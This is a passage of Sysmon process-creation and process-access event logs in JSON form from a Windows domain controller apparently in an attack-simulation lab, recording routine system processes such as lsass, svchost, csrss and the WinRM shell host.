06:01:11.622","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.638\r\nProcessGuid: {A837DB8D-0527-5F25-0000-001049C41300}\r\nProcessId: 4680\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0527-5F25-0000-002012C41300}\r\nLogonId: 0x13C412\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.638","ProcessGuid":"{A837DB8D-0527-5F25-0000-001049C41300}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0527-5F25-0000-002012C41300}","LogonId":"0x13c412","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8330,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8331,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8332,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
